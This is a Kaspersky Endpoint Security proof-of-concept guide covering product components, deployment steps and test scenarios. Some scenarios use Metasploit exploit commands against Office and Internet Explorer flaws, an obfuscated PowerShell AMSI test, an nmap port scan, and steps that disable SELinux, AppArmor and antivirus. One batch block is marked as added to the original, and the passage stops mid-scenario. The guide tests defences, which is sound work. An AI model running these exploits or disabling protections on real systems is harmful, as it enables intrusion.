Endpoint Security PoC Guide PDF

Kaspersky Enterprise Cybersecurity

Endpoint Security
Proof of Concept Guide

29.12.2017
Endpoint Security Proof of Concept Guide Page 1 of 78

Introduction ... 3
    Who should use this guide? ... 3
    What is Endpoint Security? ... 3
    What are the components of Endpoint Security? ... 4
Prepare the environment ... 8
    Review the requirements ... 8
    Download required files ... 9
    Configure network ... 10
    Check accounts rights and permissions ... 11
Setup and deploy ... 11
    Kaspersky Security Center 10 ... 11
    Kaspersky Endpoint Security 11 ... 22
    Kaspersky Security 10 for Windows Servers ... 28
    Kaspersky Endpoint Security 10 for Linux ... 33
    Activation ... 38
    Update ... 38
Capability scenarios ... 38
    Antimalware protection for workstations (KES) ... 38
    Antimalware protection for servers (KSWS, KESL) ... 50
    Data protection for Desktops (KES) ... 56
    Desktop controls ... 64
Conclusion ... 73
Appendix A: POC success criteria ... 74
Appendix B: Further Reading ... 76
Appendix C: Ransomware emulation script ... 77
Appendix D: AMSI demonstration scripts ... 78


Introduction
Who should use this guide?
This guide is built to help you quickly deploy and configure Kaspersky Endpoint Security (hereinafter KES) for
evaluation. It guides you through detailed scenarios in a proof of concept environment to help you better
understand how the solution works. The instructions provide an evaluation method for the most common use cases
of endpoint security. The target audience includes KL’s presales engineers and third parties wishing to evaluate KES
products.

It is assumed that the reader will:

1. Possess experience in a system administration or technical reviewer role;
2. Have basic knowledge of computer networking.

What is Endpoint Security?

The Kaspersky Endpoint Security solution is designed to protect physical, virtual and cloud-based endpoints (desktops
and servers) and includes the following products:

• Kaspersky Endpoint Security 11 for Windows – endpoint protection for Windows desktops;
• Kaspersky Endpoint Security 10 for Linux – endpoint protection for Linux desktops and servers;
• Kaspersky Security 10 for Windows Servers – endpoint protection for Windows servers and 3rd party ICAP-capable systems;
• Kaspersky Security Center 10 – centralized management for Endpoint Security products.


What are the components of Endpoint Security?

[Figure 1. Endpoint Security components: diagram of Kaspersky Security Center exchanging updates, KSN requests, events and reporting with the Network Agent and Kaspersky Endpoint Security on workstations and laptops, Kaspersky Endpoint Security for Linux on a Linux server, and Kaspersky Security for Windows Servers on a Windows server / 3rd-party system, with KSN and the Kaspersky Lab Update servers upstream]

Figure 1. Endpoint Security components

Kaspersky Security Center

Kaspersky Security Center (KSC) is designed for centralized execution of basic administration and maintenance
tasks in an organization's network. The application provides the administrator with access to detailed information
about the organization's network security level; it lets you configure all the components of protection based on
Kaspersky Lab applications.

The components of KSC are:

• Administration Server. Centralized storage of information about installed applications and their management.
• Network Agent. This component coordinates the interaction between the Administration Server and Kaspersky Lab applications installed on a workstation or server.
• Administration Console. A Microsoft Management Console (MMC) snap-in that provides a graphical interface to manage the Administration Server and Network Agent.


Kaspersky Endpoint Security 11 for Windows

Kaspersky Endpoint Security (KES) provides comprehensive computer protection against various types of
threats, network and phishing attacks. Each type of threat is handled by a dedicated component. Components can
be enabled or disabled independently of one another, and their settings can be configured.

The following features are implemented in the application:

• NEW! Integrated Endpoint Sensors component of Kaspersky Anti Targeted Attack Platform (KATA) to provide Endpoint Detection and Response (EDR) capabilities:
    o IoC scanner
    o Incident response tools
    o Incident investigation capabilities
  This feature is out of scope for this guide. For more information please contact the ESIG team at ESIG@kaspersky.com.
• NEW! System Watcher for Servers and Desktops. This component keeps a record of application activity on the computer and provides this information to other components to ensure more effective protection of the computer.
• NEW! Protection of shared folders from remote encryption.
• NEW! Lightweight mode for Threat Protection (Cloud mode): lightweight antivirus databases used with KSN enabled (requires less RAM and drive space).
• NEW! Application Control improvements:
    o Mixed mode (test mode with blocking rules)
    o New KL category: Trusted certificates
• NEW! Device Control improvements:
    o Anti-Bridging (blocks unauthorized bridging between networks)
    o Importing/exporting the list of trusted devices (in XML format, which is convenient for reading and editing manually)
• NEW! Simplified next-gen GUI and various UX improvements.
• File Anti-Virus. This component protects the file system of the computer from infection. File Anti-Virus starts together with Kaspersky Endpoint Security, continuously remains active in computer memory, and scans all files that are opened, saved, or started on the computer and on all connected drives. File Anti-Virus intercepts every attempt to access a file and scans the file for viruses and other threats.
• Mail Anti-Virus. This component scans incoming and outgoing email messages for viruses and other threats.
• Web Anti-Virus. This component scans traffic that arrives on the user's computer via the HTTP and FTP protocols, and checks whether URLs are listed as malicious or phishing web addresses.
• Firewall. This component protects data that is stored on the computer and blocks most possible threats to the operating system while the computer is connected to the Internet or to a local area network. The component filters all network activity according to rules of two kinds: network rules for applications and network packet rules.
• Network Monitor. This component lets you view the network activity of the computer in real time.


• Network Attack Blocker. This component inspects inbound network traffic for activity that is typical of network attacks. Upon detecting an attempted network attack that targets your computer, Kaspersky Endpoint Security blocks network activity from the attacking computer.
• Application Startup Control. This component keeps track of user attempts to start applications and regulates the startup of applications.
• Host Intrusion Prevention System (HIPS) or Application Privilege Control. This component registers the actions of applications in the operating system and regulates application activity depending on the trust group of a particular application. A set of rules is specified for each group of applications. These rules regulate the access of applications to user data and to resources of the operating system. Such data includes user files (My Documents folder, cookies, user activity information) and files, folders, and registry keys that contain settings and important information from the most frequently used applications.
• Device Control. This component lets you set flexible restrictions on access to data storage devices (such as hard drives, removable drives, tape drives, and CD/DVD disks), data transmission equipment (such as modems), equipment that converts information into hard copies (such as printers), or interfaces for connecting devices to computers (such as USB, Bluetooth, and Infrared).
• Web Control. This component lets you set flexible restrictions on access to web resources for different user groups.

Kaspersky Security 10 for Windows Servers

Kaspersky Security 10 for Windows Server (KSWS) protects servers running on Microsoft® Windows®
operating systems and network attached storages against viruses and other computer security threats to which
servers are exposed through file exchange.

You can install KSWS on the following servers:

• Terminal servers
• Print servers
• Application servers
• Domain controllers
• Servers that are protecting network attached storages
• File servers – these servers are more likely to get infected because they exchange files with user workstations.

The application includes the following components:

• Real-Time Protection. KSWS scans objects when they are accessed.
• Server Control. KSWS monitors all attempts to access network file resources, enables Applications Launch Control, and blocks access to the server for remote computers if they show malicious or encryption activity.
• RPC-Network Storage Protection and ICAP-Network Storage Protection. KSWS installed on a server under a Microsoft Windows operating system protects network attached storages against viruses and other security threats that infiltrate the server through exchange of files.
• On-demand scan. KSWS runs a single scan of the specified area for viruses and other computer security threats. KSWS scans server files and RAM and also startup objects.

The following functions are implemented in the application:

• Databases and software modules update. KSWS downloads updates of application databases and modules from FTP or HTTP update servers of Kaspersky Lab, Kaspersky Security Center Administration Server, or other update sources.


• Quarantine. KSWS quarantines probably infected objects by moving such objects from their original location to Quarantine. For security purposes, objects are stored in Quarantine in encrypted form.
• Backup. KSWS stores encrypted copies of objects classified as Infected or Probably infected in Backup before disinfecting or deleting them.
• Administrator and user notifications. You can configure the application to notify the administrator and users who access the protected server about events in KSWS operation and the status of Anti-Virus protection on the server.
• Importing and exporting settings. You can export Kaspersky Security settings to an XML configuration file and import settings into Kaspersky Security from the configuration file. All application settings or only settings for individual components can be saved to a configuration file.
• Applying templates. You can manually configure the security settings of a node in the server file resources tree and save the values of the configured settings to a template. This template can then be used to configure the security settings of other nodes in Kaspersky Security protection and scan tasks.
• Writing events to the event log. KSWS logs information about the settings of application components, the current status of tasks, events that occurred during their run, events associated with KSWS management, and information required for failure diagnostics in the KSWS operation.
• Hierarchical storage. Kaspersky Security can operate in hierarchical storage management mode (HSM systems). HSM systems allow data relocation between fast local drives and slow long-term data storage devices.
• Trusted zone. You can create a list of exclusions for the protection scope or scan scope which KSWS applies to On-Demand Scan, Real-Time File Protection, Script Monitoring, and RPC-Network Storage Protection.
• Managing permissions. You can configure the rights for managing KSWS and the rights for managing Windows services that are registered by the application, for users and groups of users.

Kaspersky Endpoint Security 10 for Linux

Kaspersky Endpoint Security 10 for Linux (KESL) protects computers running Linux® operating systems
against malware. Threats can infiltrate the system via network data transfer channels or from removable drives.

The application allows you to:

• Scan file system objects located on the computer's local drives, as well as mounted and shared resources accessed via the SMB and NFS protocols. The application can scan file system objects both in real time using real-time protection tasks and on demand using on-demand scan tasks.
• Scan boot sectors using the boot sector scan task.
• Scan process memory using the process memory scan task.
• Detect infected objects. If an object is found to contain code from a known virus, KESL considers the object infected.
• Neutralize threats detected in files. Depending on the type of threat, the application automatically chooses the action to be performed in order to neutralize the threat.
• Save backup copies of files before disinfection or deletion and restore files from backup copies.
• Manage tasks and configure their settings. You can manage the real-time protection task, on-demand scan task, boot sector scan task, process memory scan task, update task, update rollback task, and update distribution task.


• Add keys, activate the application using activation codes, and use the application based on a subscription.
• Notify the administrator about events occurring during the operation of KESL.
• Update KESL databases from Kaspersky Lab update servers, via the Administration Server, or from a user-specified source, by schedule or on demand. The application uses anti-virus databases to detect and disinfect infected files. KESL analyzes each file for threats during the scan process: file code is matched against code that resembles a particular threat.
• Manage KESL using the following methods:
    o From the command line using the application control commands
    o Via Kaspersky Security Center

Prepare the environment

Review the requirements

Hardware requirements

Table 1. Endpoint Security hardware requirements

Component                                 | CPU, GHz     | RAM, GB | HDD, GB
Kaspersky Security Center                 | 1.4          | 4       | 10
Kaspersky Endpoint Security 11            | TBA          | TBA     | TBA
Kaspersky Security 10 for Windows Servers | 2.4 x 4 core | 2       | 4
Kaspersky Endpoint Security 10 for Linux  | 1.86         | 2       | 1
Network Agent                             | 1.4          | 0.5     | 1

Please note that the RAM and CPU requirements of the Network Agent, Administration Server and Administration
Console are the minimum requirements for installation of these components. It is recommended that you use
computers with a larger amount of RAM and a greater CPU frequency.

Kaspersky Endpoint Security 10 for Linux requires the swap partition to be at least 1 GB.

Software requirements

Kaspersky Security Center 10

The list of supported OS for the Administration Server, Administration Console and Network Agent is available at
https://support.kaspersky.com/ksc10#requirements

Linux OS:

The glibc.i686 module must be installed to Red Hat® Enterprise Linux® 7 or later, CentOS 7 or later, and
Oracle Linux 7 or later prior to installing Network Agent.

The glibc-32bit module must be installed to 64-bit versions of openSUSE® 42.2 and SUSE® Linux Enterprise
Server 12 prior to installing Network Agent.


The libc6-i386 module must be installed to 64-bit versions of Debian and Ubuntu prior to installing Network
Agent.

Kaspersky Endpoint Security 11 for Windows

The list of system requirements for Kaspersky Endpoint Security 11 will be available in Q1 2018 and added to this
document. Until then, please use the requirements for Kaspersky Endpoint Security 10:
https://support.kaspersky.com/kes10wks#requirements

Kaspersky Security 10 for Windows Server

Before installing Kaspersky Security 10 for Windows Servers, remove third-party antivirus software from the
server. Kaspersky Security 10 for Windows Servers can be installed on top of Kaspersky Anti-Virus 8.0 for
Windows Servers Enterprise Edition.

For installation and correct operation of KSWS, Microsoft Windows Installer 3.1 must be installed on the
server.

System requirements: https://support.kaspersky.com/kes10wks#requirements

Kaspersky Endpoint Security 10 for Linux

System requirements: https://support.kaspersky.com/kes10linux#requirements

Download required files

Kaspersky Security Center

Application distribution package (beta): ksc_10sp3_10.5.1529_full_en.exe

Alternative location with additional info (KL forum): https://forum.kaspersky.com/index.php?/topic/379114-general-information/

Kaspersky Endpoint Security 11 for Windows

The download link for the KES 11 distribution package will be available in Q1 2018 and added to this document. Until then, please use the files
for the Kaspersky Endpoint Security 11 beta:

KES 11 installer (AES256 encryption, beta)

The installer contains encryption tools which use the AES cryptographic algorithm with an effective key length
of 256 bits. The installer must be downloaded and used in accordance with local legislation.

Alternative location with additional info (KL forum): https://forum.kaspersky.com/index.php?/topic/379106-general-information/

Kaspersky Security 10 for Windows Server

Application distribution package: ks4ws_10.0.0.486_en.exe

KSC management plugin: klcfginst.exe


Kaspersky Endpoint Security 10 for Linux

Application distribution package for Linux (deb) x64: kesl_10.0.0-3458_amd64.deb

Application distribution package for Linux (deb) x86: kesl_10.0.0-3458_i386.deb

Application distribution package for Linux (rpm) x64: kesl-10.0.0-3458.x86_64.rpm

Application distribution package for Linux (rpm) x86: kesl-10.0.0-3458.i386.rpm

Network Agent for Linux (deb): klnagent_10.1.1-26_i386.deb

Network Agent for Linux (rpm): klnagent-10.1.1-26.i386.rpm

KSC management plugin: klcfginst.msi (requires the Visual C++ 2015 Redistributable to be installed on the
Administration Server).

Files for remote installation via KSC: kesl.zip

Configure network

To be able to use all the features of Endpoint Security described in this guide, make sure the following ports are
open on the hosts.

Please note that this is the list of ports that must be open for the POC purposes only. For the full list of
required ports see https://support.kaspersky.com/9297#block1

Port number | Protocol | Description

Computer hosting the Administration Server
13000 | TCP | Required for receiving data from client computers, connecting Update agents, and connecting slave Administration Servers using the secure SSL connection
13000 | UDP | Required for reporting on computers' shutdown
13111 | TCP | Required for connecting to the KSN proxy server
13291 | TCP | Required for the SSL connection between the Administration Console and the Administration Server
14000 | TCP | Required for receiving data from client computers, connecting Update agents, and connecting slave KSC servers without using the SSL connection
17000 | TCP | Required for the secure SSL connection to the activation proxy server

Endpoint without Network Agent installed
445 | TCP | Required for remote installation of Network Agent

Client computer with the Network Agent installed
15000 | UDP | Used for receiving a request for connection to the Administration Server, which allows receiving information about the computer in real-time mode

Check accounts rights and permissions
To install KSC and/or Network Agent, you must have Administrator permissions on the computer on which you are
installing the product.

If you do not plan to install KESL via KSC and Network Agent, you must have root privileges on the computer on
which you are installing the product.

Table 2. Privileges required for installation

                    | KSC                 | Network Agent       | KESL | KES           | KSWS
Local installation  | Local administrator | Local administrator | root | Administrator | Local administrator
Remote installation | N/A                 | Local administrator | −    | −             | Local administrator

If you plan on using a different user account as a default account for running the services of Kaspersky
Security Center, you must add it to the KLAdmins group after installing the product.

Setup and deploy

This chapter describes the installation process of each component of Endpoint Security.

Kaspersky Security Center 10

Since KSC consists of several components, the installation process is divided into two steps:

1. Install the Administration Server and Administration Console
2. Deploy the Network Agent on Windows or Linux workstations.

Administration server

This section shows the installation of the Administration Server component.


1. Run the ksc_10sp3_10.5.1529_full_en.exe file. You will see the following window. Select Install Kaspersky Security Center 10.

2. If the .NET Framework is already installed in the system you will see the following window. Otherwise you will be asked to install the missing feature. Proceed to the next step.

3. Accept the EULA and proceed.


4. Select the installation type. It is recommended to choose the Custom type. Proceed to the next step.

5. Select the components to install.

6. Specify the infrastructure size.


7. Specify the user account to start the Administration Server service.

8. Specify an account for the Kaspersky Security Center 10 services.

9. Select the database server type.


10. Specify the MS SQL Server parameters.

11. Choose the authentication mode.

12. Specify the shared folder to be created.


13. Specify the Administration Server connection settings.

14. Specify the Administration Server address.

15. Pick the plugins to install.


16. Proceed with the installation process.

17. Wait until the installation completes.

Congratulations! You have installed the Administration Server and Administration Console.

On the first run of the Administration Console after the installation of the Administration Server you will be prompted to
add a license key for Kaspersky Security Center and create or import the policies for the applications. You can
proceed with the wizards or cancel these steps.

Please note that these steps may be updated slightly when the KES 11 release becomes available in Q1 2018.

Network agent for Windows

Network Agent (Kaspersky Security Center Administration Agent) can be installed locally or remotely by means of
KSC. This section shows the remote installation of a network agent.


1. In KSC expand Advanced, then Remote installation and the Installation packages section. Find Kaspersky Security Center 10 Network Agent and right-click on it. From the drop-down menu select the Install application option. The Remote installation task creation wizard will start.

2. Specify the device selection type for installation. Install on group of managed devices will create a group task. Select devices for installation will create a task for a device selection. In this example the second type is used.


3. Select the devices for installation. By default network polling is performed right after the Administration Server installation. If you don’t see the target device in this list you can choose it manually by specifying the IP address or FQDN of the target device after clicking the Add button.

4. Specify the remote installation task settings.


5. Specify the actions to perform after the installation finishes.

6. Specify an administration group where the devices will be placed after the installation, if needed.


7. Specify the account to access the devices.

8. Start the installation process by clicking Next on this step.

9. Close the task creation wizard by clicking Finish. The task will start.

After the task completes you will have Network Agents installed on the target devices.


Network agent for Linux

At the moment, KSC does not support remote installation of Network Agent on Linux OS. However, it is possible to
do this if an SSH daemon is up and running on the target VMs.

To perform remote installation via SSH you need the PuTTY utilities package to be installed on the KSC
server.

Create a .bat script, for example install.bat, and paste the following content into it:

    REM Target computer and the root password used for the SSH sessions
    set COMP=[target computer IP address]
    set PW=[password for root]
    REM Download the Network Agent package and the answer file from the KSC web server to /home/root
    "C:\Program Files\PuTTY\plink.exe" -pw %PW% root@%COMP% "wget -P /home/root http://[ksc_ip_address]:8060/Public/klnagent-10.1.1-18.i386.rpm"
    "C:\Program Files\PuTTY\plink.exe" -pw %PW% root@%COMP% "wget -P /home/root http://[ksc_ip_address]:8060/Public/answer.txt"
    REM Install the package
    "C:\Program Files\PuTTY\plink.exe" -pw %PW% root@%COMP% "rpm -i /home/root/klnagent-10.1.1-18.i386.rpm"
    REM Run the post-install script, feeding it the answers from answer.txt
    "C:\Program Files\PuTTY\plink.exe" -pw %PW% root@%COMP% "/opt/kaspersky/klnagent/lib/bin/setup/postinstall.pl < /home/root/answer.txt"

In this document the plink.exe utility is used for remote command execution (an SSH client analog for Windows). To be able
to run commands on a remote PC the utility needs a user account (root in this case), its password (-pw flag)
and the target host name or IP address (COMP variable).

To deploy Network Agent on several VMs you have to modify the script to include a FOR loop statement that goes through
the list of VMs.

Optionally you can configure password-less SSH access to the VMs using public key authentication, to avoid
putting the password in the script.

The first two commands start the wget utility on the target machine, which downloads the necessary files from the KSC
web server to the /home/root folder (-P flag). After this, Network Agent is installed.

Right after the installation, the post-install script starts and is provided with answers from the answer file (answer.txt):

    ksc.testlab.local
    14000
    13000
    Y
    1

Each line of this file contains the information requested by the Network Agent setup script:

1. Administration Server address
2. The port used for connecting to the Administration Server
3. SSL port used for connecting to the Administration Server
4. Consent to use SSL for connecting to the Administration Server
5. Connection gateway mode (1 means the connection gateway is not used)

After the Network Agent is installed, move the computer to the Managed computers administration group.
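The following batch script is an added example and not part of the original guide: it is the FOR-loop variant of install.bat described above, reading the target VMs from a hosts list and using PuTTY public key authentication (the optional password-less setup mentioned above) instead of a clear-text root password. The file names hosts.txt and ksc_key.ppk and the -q flag for wget are assumptions; the package name, KSC web server port and answer file are the ones from the guide.

```batch
@echo off
REM Added example, not from the original guide: deploy Network Agent to several Linux VMs.
REM Assumptions: hosts.txt (one IP address or FQDN per line, lines starting with # are
REM ignored) and ksc_key.ppk (PuTTY private key whose public half is in root's
REM authorized_keys on every target) sit next to this script.
REM The SSH host key of every target must already be cached by PuTTY (connect once
REM interactively): -batch makes plink fail on an unknown host key instead of accepting it.
setlocal
set "PLINK=C:\Program Files\PuTTY\plink.exe"
set "KEY=%~dp0ksc_key.ppk"
set "KSC=[ksc_ip_address]"
set "PKG=klnagent-10.1.1-18.i386.rpm"
set "REMOTE=/home/root"
set "FAILED=0"

REM Each host is handled by the :deploy subroutine so that a failure on one VM
REM is reported but does not stop the rollout to the remaining hosts.
for /F "usebackq eol=# tokens=* delims=" %%H in ("%~dp0hosts.txt") do (
    call :deploy %%H || set "FAILED=1"
)
if "%FAILED%"=="1" (echo Some hosts failed, see the output above & exit /b 1)
echo All hosts done
exit /b 0

:deploy
REM %1 is the target host. Every step stops this host on error and returns a non-zero code.
echo === Deploying Network Agent to %1 ===
"%PLINK%" -batch -i "%KEY%" root@%1 "wget -q -P %REMOTE% http://%KSC%:8060/Public/%PKG% http://%KSC%:8060/Public/answer.txt" || (echo [%1] download failed & exit /b 1)
"%PLINK%" -batch -i "%KEY%" root@%1 "rpm -i %REMOTE%/%PKG%" || (echo [%1] rpm install failed & exit /b 1)
"%PLINK%" -batch -i "%KEY%" root@%1 "/opt/kaspersky/klnagent/lib/bin/setup/postinstall.pl < %REMOTE%/answer.txt" || (echo [%1] postinstall failed & exit /b 1)
echo [%1] done
exit /b 0
```

Run it from the KSC server as the account that owns ksc_key.ppk; a non-zero exit code means at least one host needs attention.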

Kaspersky Endpoint Security 11

Like the Network Agent, KES can be installed locally using the installation wizard or remotely by means of KSC.

This section describes the remote installation using a remote installation task. First you will create an installation
package, then proceed with the task.


1. In KSC expand Advanced, then Remote installation and the Installation packages section. Click the Create installation package button.

2. Select Create installation package for Kaspersky Lab application.

3. Define a name for the package.

4. Specify the distribution package. Click Browse and select the kes_win.kud file.

5. Accept the EULA.


6. Wait until the package is uploaded to the Administration Server.

7. Specify the remote application installation settings.

8. Finish the package creation wizard.

9. Open the package properties and enable the Data Encryption components for installation.


10. Right click on the newly created package and


select Install application from context menu.

11. Specify devices for installation selection type.

Install on group of managed devices will


create a group task.

Select devices for installation type will create


a task for device selection.

In this example second type is used.

12. Pick devices for installation.

Endpoint Security Proof of Concept Guide Page 25 of 78


Kaspersky Enterprise Cybersecurity

13. On this step you can add a license key.

You can skip this step by selecting Automatic


distribution and clicking Next button.

14. If you skip adding the key you will see the
following warning.

Click Yes to proceed.

15. Specify the actions to perform after the


installation finishes.

Endpoint Security Proof of Concept Guide Page 26 of 78


Kaspersky Enterprise Cybersecurity

16. Specify whether to uninstall incompatible third


party applications during the installation or not.

17. If necessary specify an account under which


perform the installation.

If the Network Agent is already installed select


first option.

Endpoint Security Proof of Concept Guide Page 27 of 78


Kaspersky Enterprise Cybersecurity

18. Start the installation process by clicking Next on


this step.

19. Close the task creation wizard by clicking Finish.


The task will start.

Kaspersky Security 10 for Windows Servers

KSWS can be installed locally using the installation wizard or remotely by means of KSC.

This chapter describes the remote installation using a remote installation task. First you will create an installation package, then proceed with the task.

If you did not select the application management plug-in to be installed during the Administration Server installation, install it now. To do so, run klcfginst.exe, which is located within the application distribution package.

1. In KSC expand Advanced, then Remote installation, and open the Installation packages section. Click the Create installation packages button.
2. Select Create installation package for Kaspersky Lab application.
3. Define the package name.
4. Specify the distribution package. Click Browse and point to the ks4ws.kud file. The default file location is [Drive letter]:\ks4ws\10.0.0.486\english\server
5. Accept the EULA.
6. Wait until the package is uploaded to the Administration Server.
7. Finish the package creation wizard.
8. Open the package properties and change the set of components if necessary.
9. Right-click the newly created package and select Install application from the context menu.
10. Specify the device selection type for the installation. Install on group of managed devices creates a group task. Select devices for installation creates a task for a device selection. In this example the second type is used.
11. Pick the devices for installation.
12. Define the remote installation task settings.
13. If you have an appropriate key in the KSC license container, you can select it on this step. Or you can add a new key here.
14. Specify the actions to perform after the installation finishes.
15. If necessary, specify the account under which to perform the installation. If the Network Agent is already installed, select the first option.
16. Start the installation process by clicking Next on this step.
17. Finish the task creation wizard.

Congratulations! Now you have KSWS 10 installed on the target devices.

In order to be able to manage the application remotely, you have to create an application security policy. If no policy has been created yet, create one with default parameters.

Kaspersky Endpoint Security 10 for Linux

Before installation you need to disable SELinux or AppArmor. Disabling them removes a mandatory access control layer from the host, so this is appropriate for the PoC machines only:

Ubuntu: https://help.ubuntu.com/community/AppArmor#Disable_AppArmor_framework

Debian: https://wiki.debian.org/AppArmor/HowToUse

CentOS/RHEL: https://wiki.centos.org/HowTos/SELinux#head-430e52f7f8a7b41ad5fc42a2f95d3e495d13d348

1. Extract the remote installation files. Place kesl-10.0.0-3458.x86_64.rpm in the folder where the remote installation files were extracted.
2. In KSC expand Advanced, then Remote installation, and open the Installation packages section. Click the Create installation packages button.
3. Select Create installation package for Kaspersky Lab application.
4. Define the package name.
5. Specify the distribution package. Click Browse and point to the kesl.kud file.
6. Accept the EULA.
7. Finish the package creation wizard.
8. Right-click the newly created package and select Install application from the context menu.
9. Specify the device selection type for the installation. Install on group of managed devices creates a group task. Select devices for installation creates a task for a device selection. In this example the second type is used.
10. Pick the devices for the installation.
11. Specify the actions to perform after the installation finishes.
12. If you have an appropriate key in the KSC license container, you can select it on this step.
13. Or you can add a new key here.
14. Finish the task creation wizard.

Congratulations! Now you have KESL installed on the target devices.

Activation
You can activate the application within the deployment process. If you did not do this, you can add a license key later with an activation task. The task name differs slightly for each application described in this guide: for KES for Windows and KES for Linux the task name is Add key, and for KSWS the task name is Activation of Application.

Update
After the installation of the Endpoint Security applications (KES 11 for Windows, KES 10 for Linux and KSWS 10) you must create the update tasks for each application and run a database update in order to ensure that the latest databases and signatures are used.

Capability scenarios
The following scenarios are designed to help you experience the key features of Endpoint Security. They highlight the most important new functionality and take you through how you can use these features in your own case. You can go through them in order or start with the one that interests you most. They can be demonstrated in any order at any time.

The steps included in the «Setup and deploy» section are mandatory to proceed with these scenarios:

1. Anti-malware protection for workstations (KES)
   a. Malware advanced detection (AMSI)
   b. Exploits prevention
   c. Web threats protection
   d. Anti-Bridging
   e. Network Threats Protection
2. Anti-malware protection for servers (KSWS, KESL)
   a. Anti-ransomware
   b. KSWS integration with 3rd party system (ICAP)
   c. Linux server protection
3. Data protection for desktops (KES)
   a. Full Disk Encryption
   b. Removable drives file level encryption with portable mode
   c. BitLocker management
4. Desktop controls (KES)
   a. Web control
   b. Device Control
   c. Application startup control

Antimalware protection for workstations (KES)


Malware advanced detection (AMSI)

The Antimalware Scan Interface (AMSI) is a generic interface standard that allows applications and services to
integrate with any antimalware product present on a machine. It provides enhanced malware protection for users
and their data, applications, and workloads.

AMSI is antimalware vendor agnostic, designed to allow the most common malware scanning and protection techniques provided by today's antimalware products to be integrated into applications. It supports a calling structure allowing for file and memory or stream scanning, content source URL/IP reputation checks, and other techniques (source: https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx).

KES 11 supports AMSI. In this scenario you will see how KES uses AMSI to detect malware in obfuscated
PowerShell scripts.

Evaluation steps:

1. Download the obfuscation tools
2. Create a sample script
3. Obfuscate the script and execute it.
4. Check the results.

Expected results:

Get the following message in PowerShell:

This script contains malicious content and has been blocked by your antivirus software. Test succeeded.

Instructions:

1. Download the script obfuscation tools: https://github.com/danielbohannon/Invoke-Obfuscation/archive/master.zip and extract the archive.
2. Create two PowerShell scripts: bsstest_amsi.ps1 and obfuscate_bsstest_amsi.ps1 (see Appendix D).
3. Place the scripts in the obfuscation tools folder.
4. Run the command prompt with administrator privileges.
5. Execute the following command:
   powershell -executionPolicy bypass -file obfuscate_bsstest_amsi.ps1
   You will get the bsstest_amsi_obf.ps1 file.
6. Right-click the bsstest_amsi_obf.ps1 file and select Edit from the context menu.
7. Ensure that the file content is obfuscated.
8. Execute the following command:
   powershell -executionPolicy bypass -file bsstest_amsi_obf.ps1
9. Check the results.

You have shown how the script execution is intercepted with AMSI and a malicious action is prevented by KES 11.

Exploits prevention

This scenario shows the exploit prevention capabilities of Kaspersky Endpoint Security 11. The scenario requires a specific environment, which is described below. During this scenario you will use the Metasploit framework to try to exploit two different vulnerabilities using the following modules:

1. MS12-027 MSCOMCTL ActiveX Buffer Overflow
2. MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability

Environment description:

OS:
- Windows 7 SP1 x86 (32-bit, build 7601)
Installed applications:
- JRE 1.6
- MS Office 2007
- Metasploit framework (https://windows.metasploit.com/metasploitframework-latest.msi)

Evaluation steps:

1. Prepare the environment
2. Disable file threat protection
3. Install the Metasploit framework
4. Exploit the vulnerabilities
5. Check the results

Expected results:

The vulnerability exploitation is blocked by the Exploit prevention component.

Instructions:

1. Disable File Antimalware in the policy.
2. Download and install the Metasploit framework.
3. Check that exploit prevention is enabled in the policy.
4. Open the Metasploit console.
5. Execute the command:
   use exploit/windows/fileformat/ms12_027_mscomctl_bof
6. Execute the command:
   set payload windows/exec
7. Execute the command:
   set cmd calc.exe
8. Execute the command:
   run
9. The msf.doc file will be created in C:\Users\[current user]\.msf\local. Open this file. The file opening will be blocked.
10. In the KES 11 logs you will see a corresponding event.
11. Check the event in KSC.
12. Now go back to the msfconsole and execute the following command:
   use exploit/windows/browser/ie_cgenericelement_uaf
13. Execute the command:
   set payload windows/exec
14. Execute the command:
   set cmd calc.exe
15. Execute the command:
   run
   In the console you will get a link like:
   http://[IP address]:8080/gp8JUR7
16. Navigate to the link.
17. Check the results in the local event log…
18. … and in the KSC console.

Congratulations! You have just shown how KES 11 prevents the exploitation of vulnerabilities.

Web threats protection

The Web threat protection component ensures that the workstation is protected from different web threats, including malicious web resources, malware and ransomware. To verify that the Web threat protection component is enabled, a test phishing page is opened from a web browser. As a result, a banner with an alert is shown in the browser window.

Evaluation steps:

1. Enable the Web threat protection component
2. Access the malicious web page (a test page in this case)
3. Review the event log

Expected results:

The access to a malicious web page is blocked by the Web threat protection component.

Instructions:

1. Enable Web Threat Protection in the policy.
2. On the protected machine open a web browser and try to access the following page:
   http://www.kaspersky.com/test/wmuf
   or
   http://malware.wicar.org/data/vlc_amv.html
   Please note that the protocol must be HTTP, not HTTPS.
   You will get the following banner in the browser window.

Anti-Bridging

The Anti-Bridging feature in KES 11 denies the use of a network interface when another active network interface is present in the system. Thus you cannot create a network bridge between the enabled and disabled interfaces.

This scenario shows how to enable the Anti-Bridging feature and how it affects the system. In this how-to, you will see how to deny the use of a second Ethernet connection.

Evaluation steps:

1. Enable 2 network interfaces of the same type on the protected device.
2. Enable the Anti-Bridging feature
3. Check the results

Expected results:

The use of the second network interface is denied by the Anti-Bridging feature. One of the network interfaces becomes disabled after enabling the feature.

Instructions:

1. Check that you have multiple network interfaces enabled.
2. Open the policy properties and navigate to the Device Control section. Then click the Anti-Bridging button.
3. In the Anti-Bridging properties window tick the checkbox that enables the feature and select the interface types that will be affected. Save the policy.
4. Once the policy is applied, one of the network interfaces becomes disabled.
5. The active user will see the following notification.
6. If you try to enable the disabled interface, the other one will become disabled right after this.

Now you have Anti-Bridging enabled and configured, and the user or local administrator will not be able to create a network bridge.

Network Threats Protection

This scenario demonstrates how the Network Threat Protection component works and how it is configured.

Evaluation steps:

1. Ensure that the Network Threat Protection component is enabled
2. Download and install the nmap network mapper on the “attacker” computer
3. Perform port scanning of the protected system
4. Check the event log

Expected results:

The Network Threat Protection component detects the port scanning.

Instructions:

1. Open the policy properties and switch to the Network Threat Protection section. Ensure that the component is enabled.
2. On the “attacker” computer run Zenmap and perform a quick port scan of the target computer. Specify the target IP address in the Target field. Select Quick scan as the profile. Click Scan to start scanning.
3. The Network Threat Protection component will detect the network port scanning and alert the administrator. Check the events in KSC.
4. Detailed view.

Antimalware protection for servers (KSWS, KESL)

Anti-Ransomware

Ransomware is one of the top threats that customers are most concerned about nowadays. In this scenario servers are protected with KSWS 10, and crypto-locker software is executed from a remote host in order to encrypt valuable documents in a network share.

To protect from these threats, you will configure the Anti-Cryptor and Untrusted Host Blocking features of KSWS 10.

Evaluation steps:

